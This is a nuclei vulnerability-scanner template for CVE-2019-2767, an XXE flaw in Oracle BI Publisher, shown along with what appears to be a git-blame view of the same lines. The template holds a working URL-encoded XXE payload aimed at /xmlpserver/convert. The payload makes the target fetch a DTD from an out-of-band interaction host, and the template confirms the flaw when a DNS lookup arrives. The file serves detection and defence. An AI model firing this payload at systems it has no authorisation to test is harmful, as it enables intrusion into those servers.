nuclei-templates/cves/2019/CVE-2019-2767.yaml

id: CVE-2019-2767

info:
  name: Oracle BI XXE
  author: madrobot
  severity: high
  reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2767
  tags: cve,cve2019,oracle,xxe,oob

requests:
  - raw:
      - |
        GET /xmlpserver/convert?xml=<%3fxml+version%3d"1.0"+%3f><!DOCTYPE+r+[<!ELEMENT+r+ANY+><!ENTITY+%25+sp+SYSTEM+"http%3a//{{interactsh-url}}/xxe.xml">%25sp%3b%25param1%3b]>&_xf=Excel&_xl=123&template=123 HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        part: interactsh_protocol # Confirms the DNS Interaction
        words:
          - "dns"
Create CVE-2019-2767.yaml 2021-06-08 16:19:35 +00:00			`id: CVE-2019-2767`

			`info:`
			`name: Oracle BI XXE`
			`author: madrobot`
			`severity: high`
			`reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2767`
			`tags: cve,cve2019,oracle,xxe,oob`

			`requests:`
Update CVE-2019-2767.yaml 2021-06-08 16:22:58 +00:00			`- raw:`
			`- \|`
			`GET /xmlpserver/convert?xml=<%3fxml+version%3d"1.0"+%3f><!DOCTYPE+r+[<!ELEMENT+r+ANY+><!ENTITY+%25+sp+SYSTEM+"http%3a//{{interactsh-url}}/xxe.xml">%25sp%3b%25param1%3b]>&_xf=Excel&_xl=123&template=123 HTTP/1.1`
			`Host: {{Hostname}}`
Create CVE-2019-2767.yaml 2021-06-08 16:19:35 +00:00
			`matchers:`
			`- type: word`
			`part: interactsh_protocol # Confirms the DNS Interaction`
			`words:`
			`- "dns"`